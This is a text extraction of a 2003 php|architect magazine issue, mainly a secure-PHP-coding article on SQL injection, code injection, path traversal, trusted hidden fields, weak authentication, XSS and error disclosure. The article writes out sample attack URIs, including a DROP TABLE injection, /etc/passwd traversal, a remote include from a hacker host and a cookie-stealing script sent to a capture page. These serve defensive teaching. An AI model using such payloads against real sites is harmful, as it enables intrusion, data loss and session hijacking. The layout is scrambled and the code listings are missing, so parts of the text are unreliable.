This content was uploaded by our users and we assume good faith they have the permission to share this book. If you own the copyright to this book and it is wrongfully on our website, we offer a simple DMCA procedure to remove your content from our site. Start by pressing the button below!
March 1st - March 5th 2004 Signup now and save $100.00! Hurry, space is limited.
Visit us at www.phparch.com/cruise for more details. Andrei Zmievski - Andrei's Regex Clinic, James Cox - XML for the Masses, Wez Furlong - Extending PHP, Stuart Herbert - Safe and Advanced Error Handling in PHP5, Peter James - mod_rewrite: From Zero to Hero, George Schlossnagle - Profiling PHP, Ilia Alshanetsky - Programming Web Services, John Coggeshall - Mastering PDFLib, Jason Sweat - Data Caching Techniques Plus: Stream socket programming, debugging techniques, writing high-performance code, data mining, PHP 101, safe and advanced error handling in PHP5, programming smarty, and much, much more!
F R O M T H E E X P E R T S AT D E V E L O P E R ’ S L I B R A R Y. . .
Essential references for programming professionals
Elevate Your PHP with Advanced PHP Programming While there are many books on learning PHP and developing small applications with it, there is a serious lack of information on scaling PHP for large-scale, business-critical systems. Schlossnagle’s Advanced PHP Programming fills that void, demonstrating that PHP is ready for enterprise Web applications by showing the reader how to develop PHP-based applications for maximum performance, stability, and extensibility.
php|architect readers, get 40% off books in the Developer’s Library Visit www.developers-library.com and add the books of your choosing to your shopping cart. Upon check-out, enter the coupon code PHPARCH03 to receive discount. Offer valid through 12/31/03.
Advanced PHP Programming by George Schlossnagle ISBN: 0-672-32561-6 $49.99 US • 500 pages
MORE TITLES FROM DEVELOPER’S LIBRARY
PHP and MySQL Web Development, Second Edition
PHP Developer’s Handbook
MySQL, Second Edition
by John Coggeshall
by Paul DuBois
by Luke Welling and Laura Thomson
ISBN: 0-672-32511-X $49.99 US • 800 pages
ISBN: 0-7357-1212-3 $49.99 US • 1248 pages
ISBN: 0-672-32525-X $49.99 US • 912 pages DEVELOPER’S LIBRARY
www.developers-library.com
TABLE OF CONTENTS
php|architect Departments
6
Features
EDITORIAL From the front line
9
Secure PHP Coding by David Jorm and Jody Melbourne
I N D E X
7
What’s New!
19
Introduction to Bug Management by Dejan Bosanac
49
Product Review Lumenation and LightBulb
68
Book Review Core PHP Programming 3rd Edition
27
Advanced Database Features Exposed by Davor Pleskina
35
Creating a Reusable Menu System with XML and PHP by Leon Vismer
69
Tips & Tricks
45
By John W. Holmes
73
Bits & Pieces
by Marco Tabini
52
Real. Interesting. Stuff.
76
exit(0); Buy vs. Build By Marco Tabini
September 2003 · PHP Architect · www.phparch.com
Speaker on the High Seas
Printing with PHP by Alessandro Sfondrini
61
Installing Java for PHP by Dave Palmer
4
! W E N
Existing subscribers can upgrade to the Print edition and save! Login to your account for more details.
Buy now and save $10 off the price of any subscription† Visit: http://www.phparch.com/print for more information or to subscribe online.
Your charge will appear under the name "Marco Tabini & Associates, Inc." Please allow up to 4 to 6 weeks for your subscription to be established and your first issue to be mailed to you. *US Pricing is approximate and for illustration purposes only.
Choose a Subscription type: Canada/USA $ 81.59 $67.99 CAD ($59.99 $49.99 US*) International Surface $108.99 $94.99 CAD ($79.99 $69.99 US*) International Air $122.99 $108.99 CAD ($89.99 $79.99 US*)
*By signing this order form, you agree that we will charge your account in Canadian dollars for the “CAD” amounts indicated above. Because of fluctuations in the exchange rates, the actual amount charged in your currency on your credit card statement may vary slightly. †Limited time offer extended to September 30th, 2003.
To subscribe via snail mail - please detach this form, fill it out and mail to the address above or fax to +1-416-630-5057
EDITORIAL
php|architect n the relatively short time that I’ve been with php|architect (about six months now), I’ve seen a lot of our magazine content cross my (very messy) desk. In that same time period, I’ve been committed to gobbling up any and all PHP content gracing the pages of other publications and developer sites. I now feel that I am qualified to state an opinion: We have great content. Our authors consistently dig deep into their topics, bringing you their practical experience, examples, and well-written explanations. Their enthusiasm for their articles shines through, and brings warmth and community to the pages of php|architect every month. We constantly demand the best from our authors, and they, in turn, demand the best from us. The php|architect editorial team prides itself on being transparent, and I believe that authors enjoy writing for us because of it (maybe this helps explain why there are only two new authors and four return authors this month). By transparent, I mean that we are honest and up front with them, as well as ourselves. We view our authors as collaborators and team members, never as service providers or vendors. We are easy to work with, and are eager to bend over backward to help if we can see that an honest effort is being made. Through all of this we never compromise our integrity or settle for second best. Really, though, how could we? We serve one of the greatest software communities in the world! This brings me to my next point. I am absolutely ecstatic to have been bestowed the honor of directing the editorial path of php|architect. Our authors, our readers, and our editorial team have all worked hard to build an excellent resource that brings you the best that the PHP world has to offer each and every month. The hardest part of my new role here at php|a will probably be trying to fill Brian’s shoes – he’s got really big feet.* Brian has worked extremely hard to foster long-term relationships with our authors, and I will be working feverishly to continue to build and maintain that community, as well as various other initiatives on the front and back-end of the publication. But don’t worry, I’m still sleeping four hours a night. I sincerely hope you enjoy this month’s issue. People lost hair, sleep, and teeth over it. And, as always, if you see anything you particularly like or don’t like in our magazine this month, I strongly encourage you to send us your feedback at
E D I T O R I A L
R A N T S
I
September 2003 · PHP Architect · www.phparch.com
Volume II - Issue 9 September, 2003 Publisher Marco Tabini Editor-in-Chief Peter James [email protected] Editor-at-Large Brian K. Jones [email protected] Editorial Team Arbi Arzoumani Peter James Brian Jones Eddie Peloke Graphics & Layout Arbi Arzoumani, Hammed Malik, Marina Zlatogorov Managing Editor Emanuela Corso Director of Marketing J. Scott Johnson [email protected] Account Executive Shelley Johnston [email protected] Authors Dejan Bosanac, David Jorm, Dave Palmer, Davor Pleskina, Allessandro Sfondrini, Leon Vismer php|architect (ISSN 1705-1142) is published twelve times a year by Marco Tabini & Associates, Inc., P.O. Box. 3342, Markham, ON L3R 6G6, Canada. Although all possible care has been placed in assuring the accuracy of the contents of this magazine, including all associated source code, listings and figures, the publisher assumes no responsibilities with regards of use of the information contained herein or in all associated material.
[email protected]. Even fan letters firmly stating that “You suck.” will be warmly accepted, as they help to break up the large amounts of spam that we all get from that address.
* Actually, I’ve never physically seen Brian, or Brian’s shoes... I’m pretty sure I can smell them, though.
php|a
When in Rome... Go to PHP Day 2003! he first conference dedicated exclusively to the Italian PHP Community, called PHP Day 2003, will take place on October 24, 2003 in Rome at the Universita’ Tor Vergata. The program includes several speakers from the Italian technical community, and focuses on the theme of interface development, as well as a few tutorials to get the beginners up and running. Most of all, PHP Day revolves around the concept of providing the PHP community with an opportunity to meet and exchange their experiences. If you live in Italy, this is a great opportunity to meet your fellow PHP enthusiasts. If you don’t live in Italy... this might be the perfect excuse for that long-postponed vacation! For more information on PHP Day, visit http://www.phpday.it or mail the organizers at [email protected].
T
N E W
S T U F F
What’s New! PHP 4.3.3 PHP.net announced the release of PHP 4.3.3. This release contains a large number of bug fixes and it is recommended that all users ugrade to this version. Changes include: • Synchronized bundled GD Library with GD 2.0.15 • Upgraded the bundled Expat Library to version 1.95.6 • Improved the engine to use POSIX/socket IO where feasible • and much more..... Visit to php.net download or view the change log.
work built around the concepts of separation of concerns (making sure people can interact and collaborate on a project, without stepping on each other toes) and component-based web development. Cocoon implements these concepts around the notion of ‘component pipelines’, each component on the pipeline specializing on a particular operation. This makes it possible to use a Lego(tm)-like approach in building web solutions, hooking together components into pipelines without any required programming. Cocoon is “web glue for your web application development needs”. It is a glue that keeps concerns separate and allows parallel evolution of the two sides, improving development pace and reducing the chance of conflicts. Cocoon has a PHP Generator which is not included in the binary distribution but can be found at: cocoon.apache.org/2.1/ userdocs/generators/php-generator.html Get more information or download from the Cocoon Project Page:
Apache Cocoon 2.1 Apache Cocoon is a web development frame-
September 2003
●
PHP Architect
●
www.phparch.com
cocoon.apache.org/
7
NEW STUFF Access/ODBC database servers, phpBB is the ideal free community solution for all web sites.” ZEND Studio 3.0.0 Beta Zend.com announced this month the release of the Zend Studio 3.0.0 Beta for Windows and Mac. The latest release includes: • Code Profiler – Determine which scripts are slowing down your project so you can focus your time on improving their performance • One-click debugging and profiling tool – Direct debugging and profiling of web pages directly from your browser • Code Analyzer – Pinpoint messy code, allowing you to write cleaner more correct code • Highlight syntax errors – Write clean PHP code while you are typing • Support for PHP 5.0 – Including syntax highlighting, code completion, file and project inspectors • Dramatic performance improvements • Code Completion improvements – Including improve speed, recognized constants, and new functions arguments view...and much more Get more information or download from Zend.com.
PhpBB 2.0.6 The phpBB Group is pleased to announce the release of phpBB 2.0.6 the “phew, it’s way to hot to be furry” Edition. This release had been made to fix a number of potential security related issues and more annoying bugs. Work continues on 2.2.0 and another 2.0.x release is not planned except where critical issues arise. phpBB.com describes phpBB as: ”...a high powered, fully scalable, and highly customisable open-source bulletin board package. phpBB has a user-friendly interface, simple and straightforward administration panel, and helpful FAQ. Based on the powerful PHP server language and your choice of MySQL, MS-SQL, PostgreSQL or
September 2003
●
PHP Architect
●
www.phparch.com
phpBB strongly advises all users to upgrade. Get more information for phpBB.com.
Japha 1.3.3 The Japha site touts it as “An Expandable Implementation of Java in PHP”. From Japha: (japha.xzon.net/index.html) “Japha is an attempt to bring the main classes in the Java 1.4.1 (soon to be 1.4.2, time allowing) to PHP for use in everyday programs. We do this using the syntax that has been made common with the new releases of PHP 5. This allows us to easily implement interface, abstract classes, and more inheritance capabilities, not to mention excellent error handling and the ability to better conform with user-created data types.” Get more information or download the latest version from Japha.xzon.net
LightBulb 4.79 LightBulb (formerly EzSDK) is a PHP SDK which includes a PHP source code generator, a library of PHP Classes, and an application environment consisting of premade supporting modules. The modules handle user application and data access security, DB compatibility, a built-in GUI interface with an interactive desktop and more. Check out this month’s product review for more information. This release contains changes to the spell checking features. Spell checking of user data is now an inherent, interactive user option throughout the system. Developers are able to utilize the spell check features throughout every application developed without writing any source code to facilitate this. Get more information or view the demo at ezsdk.com
php|a
8
Secure PHP Coding
F E A T U R E
by David Jorm and Jody Melbourne
eb applications, by their very nature, have a broad exposure to remote attackers and a set of potential vulnerabilities as rich as the languages and protocols from which they are born. Web applications are handling an ever-growing list of business functions, and the code driving them must be paid due attention with regard not only to performance and stability, but also to security. This article is aimed at providing a concise listing and discussion of the most common vulnerabilities that exist in PHP web applications. This vulnerability listing is used at the end of the article as the basis for developing coding and code audit/testing methodologies which can be applied to any PHP web application. Note that, for the sake of brevity, only the most common and severe vulnerabilities have been listed and that vulnerabilities outside the scope of PHP code – such as those which may exist in a web server or PHP itself – are not covered by this article.
W
NOTE: All examples use the HTTP GET method so that attacks can be easily illustrated as URIs. Keep in mind that using POST is no defence; the variables are simply in the HTTP message body rather than the query string component of the URI. From a theoretical perspective, at least, POST variables are just as easy to manipulate as GET variables.
September 2003
●
PHP Architect
●
www.phparch.com
SQL Injection An SQL injection vulnerability can rear its ugly head when user-submitted variables are used to assemble SQL queries on the server side without sufficient input validation. The underlying SQL statement can be manipulated or additional SQL statements injected by an attacker. SQL Injection is one of the most common web application vulnerabilities, but does not affect PHP code as much as other languages, mostly due to PHP’s automatic character escaping and built-in validation functions. A sample vulnerability is shown in Listing 1. A sample attack on that vulnerability might look like the following: http://www.server.com/listing1.php?artid= 0%20or%20ArticleID%20<>%200
Note that the value being passed to artid is a urlencoded version of “0 or ArticleID <> 0”. Making a call to the link above would cause the following value to be assigned to $ssql and exe-
instead of http://example.com/items.php?itemID=123
could return a telltale error like this one:
cuted on the SQL server:
mySQL error with query SELECT myitem FROM shop_item WHERE itemid=123’;: You have an error in your SQL syntax near ‘’’ at line 1
SELECT ArticleContents FROM Articles WHERE ArticleID = 0 OR ArticleID <> 0
Some database servers also allow multiple SQL statements to be concatenated using a semicolon (;) as a separator. In that case, the following attack could be used: http://www.server.com/listing1.php?artid= 0;%20DROP%20TABLE%20Articles
In this case, the urlencoded value being passed into artid is “0; DROP TABLE Articles”. You can imagine the problems that this might cause. The key to protecting code against SQL injection attacks – also key for protecting against most web application vulnerabilities – is rigorous input validation. PHP can automatically escape some characters, such as apostrophes (‘), providing protection against attacks involving those characters, but this is not sufficient immunity. All user-controlled variables used to construct SQL statements or other commands must be stripped of any content that may alter the effects of the query. For numeric inputs, either verify that the value is indeed numeric, or make it numeric using settype(). For nonnumeric inputs, run the variable through addslashes() or addcslashes() before using it to construct a query. The vulnerable example above is patched in Listing 2. More information on patching against SQL injection is available at www.zend.com/manual/security.database.php. In testing for SQL injection, the blackbox tester studies application inputs and attempts to insert special characters (such as commas, apostrophes, semicolons, quotation marks, and equal signs) or SQL keywords (AND, OR, SELECT, INSERT, etc). With many of the popular backends, informative error pages are displayed by default, which can often give clues to the underlying SQL query September 2003
●
PHP Architect
●
www.phparch.com
It is evident from this response that the value for itemID is being used directly (without any validation) within an SQL query. PHP Code Injection When user-defined inputs form the file path parameters used to call include(), fopen() or other similar functions, there are several possibilities for exploitation. The first, PHP code injection, is based on manipulating the input to include() to run your own PHP code. The second, path traversal, is based on manipulating the input to include() or fopen() to display files or create an open proxy. Note that both of these bugs rely on the same basic problem and overlap somewhat. PHP code injection is similar to SQL injection, but involves native PHP code being injected by the user rather than SQL. This is made possible when the code makes use of the include() function. The include() function will accept a file name or URI (if the appropriate wrapper is installed) and include the contents of the resource as part of the PHP program. This is frequently used as a means of keeping libraries of code separate, and applications more modular, Listing 2 1 2 3 4 5 6 7 8 9 10
” . $resarr[0] . “\n”; } mysql_close($conn);
11 12 13 14 ?>
10
FEATURES
Secure PHP Coding
Listing 3 1 2 3 4 5 6 7 8 9
Listing 4
calling include() to load needed functions at runtime or ‘on demand’, but it’s also frequently mis-used to include local text files, or worse, remote data from a URI. PHP code injection is achieved by placing malicious PHP code inside a resource which is run through include(), or finding a way to have the include() call load something unintended by the application developer. A sample vulnerability is shown in Listing 3. A sample attack on that vulnerability might look like the following:
1 2 3 4 5 6 7 8 9 10 11
http://example.com/main.php?in=../test.inc
The response from the application might be some telltale warnings, like so: Warning: main(./../test.inc) [function.main]: failed to create stream: No such file or directory in main.php on line 102 Warning: main() [function.main]: Failed opening ‘./../test.inc’ for inclusion (include_path=’.:’) in main.php on line 102
Making a call to the above link would cause the contents of www.hacker.com/phpinjection.php to be included into the program and executed locally. This page could output any malicious code the attacker can conjure up. The primary strategy for defending against code injection attacks is to use include() appropriately. Having URI file wrappers enabled is generally a security liability and if your site does not explicitly use them, they should be disabled. If it is necessary to have user manipulable variables run through include(), ensure that they are properly validated. Listing 3 is patched in Listing 4. When trying to locate these vulnerabilities via blackbox testing, the tester would attempt to inject file and directory special characters (such as . and /) into variables and see if this elicits a response from the application which might aid an attack. Imagine that a regular (non-malicious) URL looks like this:
This response indicates that the value of the ‘in’ variable is being used within an include() call. In this case, an attacker would be able to submit a request such as: http://example.com/main.php?in=../../../.. /etc/passwd
to open (include) any readable file. Path Traversal Very closely related to PHP code injection is path traversal. Although Listing 4 protects against PHP code injection, it applies no input validation to the page GET variable, allowing the user to enter not just a file name but an absolute path. This can allow an attacker to view any file that the web server has permission to read. If URI wrappers were enabled, it would also allow an attacker to use the site as an open proxy to view Listing 5
http://example.com/main.php?in=links.inc
Let’s look at what we get if we change the query string a little, as follows:
September 2003
●
PHP Architect
●
www.phparch.com
1 2 3 4 5 6 7 8 9 10 11
11
FEATURES
Secure PHP Coding
other resources on the web. A sample vulnerability is shown in Listing 5. A sample attack on that vulnerability might look like the following: http://www.server.com/listing5.php?page= ../../../../../etc/passwd
Calling the above link might cause the contents of /etc/passwd to be returned to the attacker — obviously not what the script was supposed to do! If URI wrappers were enabled, the following attack could also be used: http://www.server.com/listing5.php? page=http://www.phparch.com
This would cause the web server to source the contents of the URI www.phparch.com and return them to the attacker, effectively working as an open proxy. Oh, what we wouldn’t do for our daily dose of PHP goodness! The key to defending against path traversal attacks is, once again, input validation. Ideally, all files that the script is serving can be numerically sequenced, requiring only a numeric input of the file number from the user. A patched version of Listing 5 using this method is shown in Listing 6. Alternatively, the page variable can be stripped of all characters which may allow a user to enter an absolute path or URI. A patched version of Listing 5 using this method is shown in Listing 7. These vulnerabilities can often be located through blackbox testing of the application. The tester would attempt to inject file and directory special characters (such as . and /) into variables and see if this returns (or attempts to return) arbitrary files. Imagine that a regular (non-malicious) URL looks like this:
Listing 6 1
versal characters (../). fopen() and include() error messages are generally very informative in describing the error, and can give the tester all the information needed to correctly manipulate this request. Trusted User Manipulable Values A major problem with the web application environment and the advanced tools used within it, of which PHP is only one, is the fact that they hide the source of some inputs from the developer. For example, PHP will expose the contents of a form field, GET variable or POST variable indiscriminately as a variable with the same name as the field or HTTP variable. Developers come to rely on this feature and can fail to consider whether a trusted variable, such as the value of a product or name of a file, comes from a source which cannot be manipulated by an attacker. The classic example is hidden form fields used to carry session-related variables, such as the name and value for products on an e-commerce site. The developer is relying on the notion that since he has set these values, he will read them back in from the subsequent form, unchanged. But when a form is submitted, the contents of the form fields are simply passed to the resource in the FORM tag’s ACTION attribute as either GET or POST variables, as specified by the METHOD attribute. An attacker can then change the price of products by making his own form carrying the desired values, or manipulating GET/POST vari-
http://example.com/viewfile.php?cat=users
Listing 7 To test for path traversal, we might use the following URL’s: http://example.com/viewfile.php?cat=/etc /motd http://example.com/viewfile.php?cat=../.. /../../etc/passwd
If the tester receives a ‘File not found’ or ‘Cannot open’ error, it may simply be a matter of adjusting paths or increasing the amount of traSeptember 2003
●
PHP Architect
●
www.phparch.com
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16
12
FEATURES
Secure PHP Coding
Listing 9
Listing 8 1 2 3 4 5 6 7 8 9
ables manually. A sample vulnerability is shown in Listings 8 (the HTML form) and 9 (the form handler). A sample attack on that vulnerability might look like the following: http://www.server.com/listing9.php?price= 1&cc=5353167819823
Calling the link above allows an attacker to successfully place an order, using a valid credit card, but with a price of the attacker’s choosing, in this case $1. The developer is presuming that the only way his form handler will be accessed is via Listing 8, where the price value is set by a PHP variable. Were POST being used rather than GET, an attacker could construct an HTML document, as shown in Listing 10, and place the order for $1 by simply submitting the new form. Trusted variable vulnerabilities can be avoided by setting session-related variables appropriately, using sessions or cookies (although both of these have some, albeit lesser, problems in their own right). A preferable solution would be to always reference the price from a database on the server side and carry a productid variable in a PHP session or browser cookie. Both of the previous vulnerabilities are patched with Listings 11 and 12. The blackbox tester examines all available source pages for evidence of HIDDEN or dynamically-generated variables. The tester saves a copy of the form page locally and manipulates these variables, loads the form page into a browser and submits the modified request. In many cases, the tester may not be able to determine if the modified values have been accepted unless they are displayed on a subsequent page (such as in the Checkout page of a shopping-cart application.) Listing 10 1 2 7
Weak Authentication Despite the widespread gospel that clear-text authentication credentials are a cardinal sin and that passwords should conform to minimum complexity rules, these fundamentals of secure programming are frequently not applied in the web application world. HTTP includes two standard authentication mechanisms: basic and digest. Both mechanisms operate as a series of HTTP exchanges with a demand for authentication issued by the server in an HTTP header, followed by a repeated request from the client, including authentication credentials in another HTTP header. The primary difference is that basic authentication uses clear text and is simply base64 encoded, while digest is encrypted using a nonce (time senListing 11 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15
Listing 12 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15
16 17 18 ?>
13
FEATURES
Secure PHP Coding
sitive value) issued by the server as a key. Basic authentication can be set up easily by using PHP’s header() function to issue the required header. The $_SERVER[‘PHP_AUTH_USER’] and $_SERVER[‘PHP_AUTH_PW’] variables are created by PHP when a request has included authentication credentials. This is, unfortunately, promoted by many tutorials on PHP programming. The main alternative to basic HTTP authentication is to have a custom solution where a session id or cookie is issued to the client once it has successfully authenticated – this token then being checked with each subsequent request for a protected resource. This relies on the developer correctly enforcing password complexity rules and is vulnerable to replay attacks. A sample vulnerability is shown in Listing 13 (allowing a weak password to be set) and 14 (doing effectively clear-text authentication). Lack of complexity rules can make you vulnerable to brute force attacks, because with short and common passwords little key space will need to be exhausted before an attacker finds his way in. Brute force attacks most commonly work either from a dictionary file of common words, or in an incremental mode trying every possible string. Sometimes a hybrid of the two is used, attaching short incremental suffixes and prefixes to common words. Listing 15 is an example of an incremental-mode brute-forcing tool. Basic HTTP authentication is vulnerable only to third party attack, where an attacker is sniffing or otherwise intercepting the site’s communication and extracting the clear text authentication credentials. No sample attack is provided for extracting clear text credentials. There is no patch, as such, for the use of basic Listing 13 1 2 3 4 5 6 7 8 9 10 11 12 13
HTTP authentication. The point was merely to illustrate that its use, without SSL or some other form of encryption, is a security liability. Password complexity rules, however, can be applied in a variety of ways. PHP functions are available to utilise the CrackLib library to check the strength of passwords. The strength is determined by length, use of upper and lower case and dictionary checks. If CrackLib is not available or you wish to enforce custom business rules for password strength, writing your own implementation is simple. Listing 13 is patched using a custom password strength test in Listing 16 To identify these vulnerabilities, the blackbox tester must first identify the authentication method in use. If basic HTTP authentication is
being used, the tester can attempt to brute-force a valid login and password pair – in most cases, account lockout restrictions are not enforced. There are many tools available online to test the strength of basic HTTP authentication. One of the more popular password cracking tools is Cain&Abel – available from http://www.oxid.it/cain.html Poorly-Applied Authentication Authentication mechanisms can sometimes fail to cover every access method for a resource and restrict access accordingly. The classic example is a menu driven by permissions associated with authentication credentials providing access to a list of resources the user is allowed to view. The resources themselves, however, do not require authentication credentials and rely on the notion that they are hidden unless access to them is provided via a menu. This is security through obscurity, and is a major flaw. A recent high-profile example of this problem is an Australian Taxation Office site where a user provided detailed credentials to authenticate their identity and were then allowed to view details associated with their Tax File Number. The page providing this access simply accepted the Tax File Number as a GET variable, such as: http://www.ato.gov.au/viewtfn.php?tfn= 231897
An attacker could simply plug in another TFN to view its details: http://www.ato.gov.au/viewtfn.php?tfn= 999999
A sample vulnerability is shown in Listings 17 (the menu) and 18 (the resource). A sample attack on that vulnerability might look like the following: http://www.server.com/listing18.php?res=1
By accessing the above URI, an attacker can bypass the authentication applied by Listing 17, and go straight to the resource (Listing 18) it was designed to provide access to. The best strategy to avoid these kinds of problems is to apply authentication at every individual resource, so it can never be bypassed. In the production world, your authentication would never be as simple as the ‘if’ test used in Listing 17, so a convenient technique is to create an authentication September 2003
●
PHP Architect
●
www.phparch.com
class and include it with every resource. These vulnerabilities are patched by Listings 19 (the authentication class) and 20 (the protected resource). Authentication and logic flaws in applications can sometimes be located via blackbox testing methods. The tester, using valid credentials, authenticates to the application and interacts as a normal user. At every point beyond the initial authentication routine, the tester locates any GET and POST variables, manipulates them using valid data, and examines the output. Imagine that a Listing 16 1 2 3 4 5 6 7 8 9 10 11 12 13 14
regular (non-malicious) URI looks like this: http://example.com/members/index.php? startpg=10167&lang=en
A sample vulnerability is shown in Listing 21. A sample attack on that vulnerability might look like the following: http://www.server.com/listing21.php?query= %3Cscript%3Efor+%28i%3D0%3B+ i%3C100%3B+i%2B%2B%29+%7B+ window.open%28%27http%3A%2F%2Fwww. porn.com%2F%27%29%3B%7D+ %3C%2Fscript%3E
A blackbox tester might try the following: http://example.com/members/index.php? startpg=10169&lang=en
In the above example, the user might expect to receive an ‘unauthorized’ error message when attempting to submit an alternate ‘startpg’ variable. If authentication has only been applied to the application portal page (and subsequent requests are not being re-authenticated) an attacker may be able to request arbitrary start pages. Cross-Site Scripting Many sites, such as message forums, allow a user to enter content and post it to the site. This is usually handled using an SQL database to store messages and PHP code to add and render posts on demand. If the contents of these messages are not stripped for HTML tags and Javascript code, an attacker can effectively inject client-side scripts which will be run under the security context of the message forum. This vulnerability, however, is not limited to message forums. Any site where the contents of user-defined variables such as GET/POST variables, HTTP headers or cookies will form part of the page returned can be vulnerable to cross-site scripting, or XSS. As an example of XSS outside of a classic message forum example, take the following URI:
This would cause the “query” GET variable to contain: <script>for (i=0;i<100;i++;) { window.open(‘http://www.porn.com/’); }
Accessing the above URL would cause www.porn.com to be opened in a new window 100 times by a Javascript-enabled browser. Defending against XSS is not just simply a matter of stripping special characters as with SQL injection. Not accepting certain input may limit the funcListing 19 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16
In this case, the q variable would be set to “<script>alert(document.cookie);” . This will run the Javascript code alert(document.cookie); within the security context the user has set for ninemsn.com.au. This will expose the user’s cookie for the site. On a message board this could well include a session id token which could be replayed to hijack their session. This could then be logged to a remote capture application using Javascript code such as: <script>window.open(‘http://www.server.com /capture.php?cookie=’ + document.cookie);
tionality of the site. A better strategy is to parse user-defined inputs after they have been used by the PHP script, but before being returned as part of the response, to replace ‘<’ and ‘>’ characters with ‘<’ and ‘>’ respectively. This will prevent ‘<script>’ or other tags from being injected. Listing 21 is patched using this technique in Listing 22. Cross-site scripting vulnerabilities are generally quite easy to locate using blackbox testing methods. The tester examines all GET and POST variables to determine if any of these values are being returned within page outputs. In the example below, the tester can safely assume that the contents of the Title variable will be used somewhere within the returned page. Imagine that a regular (non-malicious) URI looks like this:
A sample attack on that vulnerability might look like the following: http://www.server.com/listing23.php
If an attacker runs the above URI when the database server is down and /mnt/data/file1.txt is not available, the following error (with HTML removed) will be given by PHP: Warning: Unknown MySQL Server Host ‘dbserver.server.com’ (2) in C:\PHP\phparch\env.php on line 2 Warning: MySQL Connection Failed: Unknown MySQL Server Host ‘dbserver.server.com’ (2) in C:\PHP\phparch\env.php on line 2
Warning: fopen(“/mnt/data/file1.txt”, “rb”) - No such file or directory in C:\PHP\phparch\env.php on line 3
The tester inserts HTML special characters (<>) into the Title variable and resubmits the request. http://example.com/index.php?articleID= 1234&Title=
TESTING
If the injected HTML can be found within the returned page, then this application is vulnerable to cross-site scripting. In this case, if the Title value is being used directly between and tags, without filtering of <> characters, additional HTML and Javascript can be injected into the returned page. Environment Information Disclosure By default, PHP displays all warnings and errors. These frequently contain verbose information pertaining to the operating environment, such as file paths, database credentials and configuration details. A sample vulnerability is shown in Listing 23.
This discloses both the name of the database server and the path from which the script is reading files. Although this does not open the site to any specific attack, it is not good security practice to disclose this kind of information The best strategy to prevent this is to disable error reporting on production sites and reserve it for development use. This is best implemented in php.ini but is illustrated using the error_reporting() function in Listing 24. The blackbox tester inserts special characters into all identified GET and POST variables in an attempt to elicit exception conditions from the application. Errors from failed include(), popen(), fopen() and DB-related calls can be extremely informative and may assist the tester in identifying further vulnerabilities. Imagine that a regular (non-malicious) URI looks like this: http://example.com/index.php?articleID=1234
Listing 22 1 2 3 4 5 6 7 8
’, ‘>’, $_GET[‘query’]); echo “You searched for “ . $q;
Let’s look at what we get if we change the query string a little, as follows: http://example.com/index.php?articleID= 1234abc’%;
?>
Listing 23 1 2 3 4 5 6 7 8
Listing 24
September 2003
●
PHP Architect
●
www.phparch.com
1 2 3 4 5 6 7 8
17
FEATURES
Secure PHP Coding
The server’s response could be as follows: Warning: Supplied argument is not a valid MySQL-Link resource in /www.example.com/cgi-bin/index.php on line 46 Warning: MySQL Connection Failed: Unknown MySQL Server Host ‘sql.example.com’ (2) in /www.example.com/cgi-bin/index.php on line 45
Secure Coding Methodology The key to coding secure web applications in PHP is to be aware of the potential flaws that your code may be vulnerable to, and be attentive in preventing these flaws throughout the entire development process. Too often security is an afterthought or added feature. The most secure code is written with security in mind from the word ‘go’. Testing Methodology The blackbox testing method is where a security professional attempts to expose flaws in an application. The term ‘blackbox’ refers to the closed-source or proprietary application, and the process of manipulating known inputs and analyzing outputs from the application. In blackbox testing PHP code, the tester examines the application and identifies all of the expected GET and POST variables, including hidden and dynamically-generated variables. These variables are then manipulated using potentially “unexpected” values – such as special characters and type-mismatched or oversized requests. In most cases, the PHP applications’ expected inputs can be identified by reading all available HTML source pages, and/or capturing and decoding valid requests. As an example, examine the following URI:
and modified locally. Manipulated GET variables can be submitted using a regular browser. Unexpected behavior may take the form of half-loaded or blank pages, or a redirect to a front page. If the application displays an error message, the tester can determine if it is vulnerable to any of the common PHP coding errors detailed in this article. Conclusion Web applications are, in security terms, a different ball game from conventional applications. The communication protocols, server-side application code and client-side presentation code combine to form a development environment in which bugs can make use of problems in various components of the technology simultaneously. To compound this problem, web technology was originally designed to handle the public dissemination of markup documents, not the development of secure applications. This is slowly being rectified, but the developer must remain astute to security concerns if he is to produce secure applications. Hopefully what has been outlined above can assist in the creation of more secure web applications.
In the above example, the GET variables that should be manipulated and tested are ID, title and lang. As another example, examine the form in Listing 25. Here, the POST variables to be tested are ‘sid’, ‘listid’ and ‘usermail’. The tester inserts special characters into each of these inputs, and submits the request. Output is analyzed to determine if the application handled the input correctly, or if some unexpected error has occurred. Manipulated POST variables can be submitted using a command-line tool such as lynx or curl, or a copy of the form input page can be saved September 2003
●
PHP Architect
●
www.phparch.com
Listing 25 1 2 3 4 5 6
About the Author
?>
David works as a document imaging and OCR programmer for a small Australian company. He spends his spare time writing PHP code and studying environmental science.
Click HERE To Discuss This Article http://forums.phparch.com/44 18
Introduction to Bug Management
F E A T U R E
by Dejan Bosanac
What is a bug? It all started in 1945 at Harvard University, while testing the Mark II Aiken Relay Calculator for malfunction. A moth was found trapped between two electrical relays. Operators removed the moth and entered the log entry “First actual case of bug being found.” They said that they had “debugged” the machine and the term “debugging a computer program” was introduced. Anyone who has ever used any kind of software is familiar with the term “bug”. But before we proceed further with our story, we should make it clear what we mean by this term. Classic definition of the bug is that it is an error in software code that causes the program to malfunction. We must be careful with this, however, because it is very closely related to the requirements of our project. We can’t tell that something is not working properly unless we know the desired behavior. Some users for example, can interpret lack of certain functionality as a bug. Because of this thin line between bugs and functionality, it is a good practice to do request tracking along with the bug tracking process, as we will see later in the text. We will introduce a new term (issue), to describe both bugs and feature requests. The layman would say that bugs in software are only the result of programmer carelessness, but anyone who has ever worked on a large software project knows that is not always true. Sometimes projects are so complicated that a minor change in one module could produce an unexpected disaster September 2003
●
PHP Architect
●
www.phparch.com
where it is least expected. There are many software techniques that model how to take your software’s quality to a higher level, but that is way beyond the scope of this article. Here, we will try to concentrate on how to keep track of the bugs (and requests) in your project. We will also learn how to organize the development process so that most of the malfunctions in the software code are detected before final release and not by your customers. Life cycle of a bug The first thing you will always hear when discussing software testing and quality assurance is that the person who implements the code should not be the person who is testing it. There are few reasons for this statement. The first is that the person who is actually writing the code has his own mindset and cannot see the certain flaws in the design even if he looks at it for a very long time. Another person, who is actually only looking at the code’s behaviour, can easily spot things that the original writer missed. The second argument is rather psychological; the tester should act destructively against the code, which is very hard to do with your own work. We won’t go deeper into details about software testing,
